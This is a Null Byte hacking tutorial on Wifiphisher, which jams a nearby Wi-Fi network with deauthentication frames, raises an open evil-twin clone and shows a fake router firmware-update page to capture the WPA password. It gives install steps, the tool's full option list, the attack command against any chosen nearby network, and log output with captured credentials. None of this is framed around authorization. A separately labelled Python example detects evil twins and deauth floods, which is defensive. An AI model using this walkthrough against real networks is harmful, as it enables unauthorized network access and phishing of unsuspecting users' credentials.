
Get everyone's Wi-Fi password without cracking Wifiphisher «Null Byte :: WonderHowTo



While password cracking and WPS setup attacks attract a lot of attention, social engineering attacks are by far the quickest way to get a Wi-Fi password. Wifiphisher is one of the most powerful Wi-Fi social engineering attacks: a tool that blocks the internet until desperate users enter the Wi-Fi password to allow a fake router firmware update.

Social engineering attacks are powerful because they often bypass security completely. If you can trick an employee into typing a password into a fake login page, it does not matter how strong the password is. This is the opposite of attacks that use the computer's power to try a huge list of passwords incredibly quickly; because of the way those attacks work, they cannot succeed if the password you are attacking is strong and is not in your password list.

Not knowing how strong the password you are attacking is can be frustrating, because investing the time and processing power of a brute-force attack only to come up dry can feel like a huge waste of resources. Instead, tools like Wifiphisher ask questions about the people behind these networks. Does the average user know what the login page of their wireless router looks like? Would they notice if it were different? More importantly, would a busy user who is cut off from the internet and stressed still enter the password to activate a fake update, even if they noticed that the login page looks a little different?

Wifiphisher bets that the answer is "Yes." To test this theory, the tool can select a nearby Wi-Fi network, de-authenticate all of its users (jamming), and create a cloned access point that does not require a password. Anyone who joins the evil twin network is shown a convincing-looking phishing page that demands the Wi-Fi password to enable a firmware update, which is given as the reason the Wi-Fi has stopped working.

The firmware update from Hell

To the target of a social engineering attack, the first signs of Wifiphisher look like a problem with the router. First, the Wi-Fi stops working. They can still see the network, but every connection attempt fails immediately. Other devices cannot connect to the network either, and they realize that not just one device but every wireless device has lost its connection to the network.

Then they notice a new network with the same name as the old network, but with no password required. After a few more attempts to connect to the protected network, they join the open network, worried that their router is suddenly broadcasting a network without a password that anyone can access. As soon as they join, an official-looking web page opens, informing them on behalf of the router's manufacturer that the router is undergoing an important firmware upgrade. The internet will not work until they enter the password to apply the update.

After they enter the highly secure Wi-Fi password, a loading screen crawls across the screen while the router "restarts", and they feel a bit proud of the security of their router for installing this important update. After a minute of waiting, their devices reconnect to the network, now more secure thanks to the update they installed.

Easy Access with a Bossy Update

For a hacker, retrieving passwords is as simple as choosing the network to target. Once a target is set, Wifiphisher immediately jams all devices connected to the network, which increases the likelihood that a person connected to the network will become frustrated and apply the fake update. Next, the target's network information is cloned and the spoofed Wi-Fi network is broadcast to make the target believe the router is stuck in an indefinite update mode.

Devices that connect are immediately logged to a list of connected targets, and the phishing page is tailored to the manufacturer of the router by reading the first part of the router's MAC address. Once Wifiphisher persuades one of the targets connected to the rogue network to enter the password, it alerts the hacker while stalling for time. After submitting the captured password, the target is cruelly kept busy with a fake update loading screen and a bogus reboot timer, giving the hacker time to test the captured password.
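The two signals this attack leaves on the air, a burst of deauthentication frames and an open access point that copies a protected ESSID, are what a defender can watch for. The following is an added example written for this article, not code from the Null Byte post or the Wifiphisher project; the trusted-network baseline, scan records and frame log are constructed sample data.

```python
# Added example: defender-side checks for the evil-twin pattern described above.
# All input data below is constructed; the trusted baseline is an assumption.

# Assumed baseline of networks we actually operate: ESSID -> (known BSSIDs, security).
TRUSTED = {
    "OfficeNet": ({"a4:2b:8c:11:22:33"}, "WPA2"),
}

# Constructed scan results, as a monitor-mode survey tool might report them.
SCAN = [
    {"essid": "OfficeNet", "bssid": "a4:2b:8c:11:22:33", "security": "WPA2", "channel": 6},
    {"essid": "OfficeNet", "bssid": "00:00:00:31:8c:e5", "security": "OPEN", "channel": 6},
    {"essid": "Coffee Shop", "bssid": "de:ad:be:ef:00:01", "security": "OPEN", "channel": 1},
]

def find_evil_twins(scan, trusted=TRUSTED):
    """Return scan entries that reuse a trusted ESSID from an unknown BSSID
    or advertise it with weaker security than the baseline (e.g. open)."""
    hits = []
    for ap in scan:
        baseline = trusted.get(ap["essid"])
        if baseline is None:
            continue  # not one of ours; out of scope for this check
        known_bssids, security = baseline
        if ap["bssid"].lower() not in known_bssids or ap["security"] != security:
            hits.append(ap)
    return hits

# Constructed per-frame log: (timestamp in seconds, frame subtype, source BSSID).
# Deauth frames are spoofed with the real AP's address, so the check is on rate,
# not on who the frames claim to come from.
FRAMES = [(0.0, "beacon", "a4:2b:8c:11:22:33")] + \
         [(0.05 * i, "deauth", "a4:2b:8c:11:22:33") for i in range(30)] + \
         [(4.0, "deauth", "de:ad:be:ef:00:01")]  # a lone deauth is normal

def deauth_flood_sources(frames, window=1.0, threshold=10):
    """Return BSSIDs that appear as source of more than `threshold` deauth
    frames within any `window`-second span (sliding window over timestamps)."""
    by_src = {}
    for ts, subtype, src in frames:
        if subtype == "deauth":
            by_src.setdefault(src, []).append(ts)
    flooding = set()
    for src, times in by_src.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flooding.add(src)
                break
    return sorted(flooding)
```

A scan entry with a trusted ESSID but an open security setting, or a deauth rate far above what a healthy AP produces, is the practical trigger for a wireless IDS alert on this attack.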

What you need

For this attack to work, you need a Kali Linux-compatible wireless adapter. If you are not sure which one to choose, read one of our guides to selecting an adapter that supports monitor mode and packet injection.

From left to right from the top: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA. Image by SADMIN / Null Byte

Apart from a good wireless adapter, you need a computer running Kali Linux. You should update it first by running apt update and apt upgrade. Failing to do so will likely cause problems during the Wifiphisher installation that follows.

Step 1: Install Wifiphisher

To start, open a terminal window and type apt install wifiphisher to install Wifiphisher.

  apt install wifiphisher
  Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0
libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160
libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16
liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7
libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26
libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10
libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24
libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21
libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9
libradare2-3.0 libsane-extras libsane-extras-common libtbb2
libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql
python-anyjson python-capstone python-couchdbkit python-http-parser
python-jwt python-libemu python-pam python-restkit python-socketpool
x11proto-dri2-dev x11proto-gl-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
python-pyric-doc
The following NEW packages will be installed:
python-pbkdf2 python-pyric python-roguehostapd wifiphisher
0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded.
Need to get 4,579 kB of archives.
After this operation, 10.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B]
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB]
Fetched 4,579 kB in 10s (458 kB/s)
Selecting previously unselected package python-pbkdf2.
(Reading database ... 431969 files and directories currently installed.)
Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ...
Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Selecting previously unselected package python-pyric.
Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ...
Unpacking python-pyric (0.1.6-0kali1) ...
Selecting previously unselected package python-roguehostapd.
Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpacking python-roguehostapd (1.2.3-0kali2) ...
Selecting previously unselected package wifiphisher.
Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ...
Unpacking wifiphisher (1.4+git20180525-0kali2) ...
Setting up python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Setting up python-pyric (0.1.6-0kali1) ...
Setting up wifiphisher (1.4+git20180525-0kali2) ...

Progress: [ 95%] [#######################################################...]

If you would rather install from the GitHub repo, you can do so by cloning the repository and following the instructions on the GitHub page:

  git clone https://github.com/wifiphisher/wifiphisher.git
  cd wifiphisher
  sudo python setup.py install

This should install Wifiphisher, which you can then start by entering the program name in a terminal window.

Step 2: Check the Wifiphisher Flags

You should be able to run the script at any time simply by typing sudo wifiphisher in a terminal window. While Wifiphisher does not have a man page, its --help page shows a pretty impressive list of configuration options that you can change by adding different flags to the command.

  wifiphisher --help
  usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE]
                   [-aI APINTERFACE] [-iI INTERNETINTERFACE]
                   [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
                   [-iNM] [-kN] [-nE] [-nD]
                   [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID]
                   [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
                   [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
                   [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH]
                   [--payload-path PAYLOAD_PATH] [-cM] [-wP]
                   [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH]
                   [-pPD PHISHING_PAGES_DIRECTORY]
                   [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

  optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Manually choose an interface that supports both AP and
                        monitor modes for spawning the rogue AP as well as
                        mounting additional Wi-Fi attacks from Extensions
                        (i.e. deauth). Example: -i wlan1
  -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
                        Manually choose an interface that supports monitor
                        mode for deauthenticating the victims. Example: -eI
                        wlan1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Manually choose an interface that supports AP mode for
                        spawning the rogue AP. Example: -aI wlan0
  -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
                        Choose an interface that is connected to the
                        Internet. Example: -iI ppp0
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Specify the MAC address of the AP interface
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Specify the MAC address of the extensions interface
  -iNM, --no-mac-randomization
                        Do not change any MAC address
  -kN, --keepnetworkmanager
                        Do not kill NetworkManager
  -nE, --noextensions   Do not load any extensions.
  -nD, --nodeauth       Skip the deauthentication phase.
  -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
                        Channels to deauth. Example: --deauth-channels 1,3,7
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue Access Point. This option
                        will skip the Access Point selection phase. Example:
                        --essid 'Free WiFi'
  -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
                        Deauth all the BSSIDs in the WLAN with that ESSID.
  -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Choose the phishing scenario to run. This option will
                        skip the scenario selection phase. Example: -p
                        firmware_upgrade
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point.
                        Example: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Capture the WPA/WPA2 handshakes for verifying the
                        passphrase. Example: -hC capture.pcap
  -qS, --quitonsuccess  Stop the script after successfully retrieving one pair
                        of credentials
  -lC, --lure10-capture
                        Capture the BSSIDs of the APs that are discovered
                        during the AP selection phase. This option is part of
                        the Lure10 attack.
  -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
                        Fool the Windows Location Service of nearby Windows
                        users into believing they are within an area that was
                        previously captured with --lure10-capture. Part of the
                        Lure10 attack.
  --logging             Log activity to file
  -dK, --disable-karma  Disables the KARMA attack
  -lP LOGPATH, --logpath LOGPATH
                        Determine the full path of the logfile.
  -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
                        Determine the full path of the file that will store
                        any captured credentials
  --payload-path PAYLOAD_PATH
                        Payload path for scenarios serving a payload
  -cM, --channel-monitor
                        Monitor if the target access point changes the channel.
  -wP, --wps-pbc        Monitor if the button on a WPS-PBC Registrar is
                        pressed.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        The WLAN interface used for associating to the WPS
                        Access Point.
  -kB, --known-beacons  Broadcast a number of beacon frames advertising
                        popular WLANs
  -fH, --force-hostapd  Force the usage of the hostapd installed in the system
  -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
                        Search for phishing pages in this location
  --dnsmasq-conf DNSMASQ_CONF
                        Determine the full path of a custom dnmasq.conf file
  -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
                        Determine the ESSID you want to use for the phishing
                        page

Step 3: Plug In Your Wireless Adapter

Now is the time to prepare the wireless adapter by plugging it in. Wifiphisher will put your card into monitor mode for you if you do not do it yourself.

Step 4: Run the Script

I will use my USB wireless network adapter, so I add the -i flag and the name of my network adapter to the command. Otherwise, Wifiphisher will simply grab whichever network adapter it can.

To start the script I execute the following command:

  sudo wifiphisher -i wlan1 

After that, we should see a page listing every nearby network. We can choose which network we want to attack and then press [Enter].

Next, the script asks "Which attack do you want to execute?" Select option 2.

After you have selected the attack, it starts immediately. It opens a page that listens for targets joining the network. Wifiphisher also watches for devices that probe for networks that do not exist and creates fake versions of them to lure those devices into connecting.

After a target has joined, a pop-up window prompts them for the password.

If the target enters the password, we are notified in the Wifiphisher screen.

That's it! The script exits and shows you the password that was just entered.

  [*] Starting Wifiphisher 1.4GIT (https://wifiphisher.org) at 2019-02-04 08:10
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC address (BSSID) to 00:00:00:31:8c:e5
[!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials:
wfphshr-wpa-password=mypassword
[!] Closing

You have bypassed password security and tricked a user into entering the Wi-Fi password into your fake network. Worse, they are still stuck behind that dreadful, slow-moving fake loading screen.

If you are looking for a cheap, handy platform for getting started with Wifiphisher, take a look at our Kali Linux Raspberry Pi build with the $35 Raspberry Pi.

Cover Picture by Justin Meyers / Gadget Hacks; Screenshots of Kody / Null Byte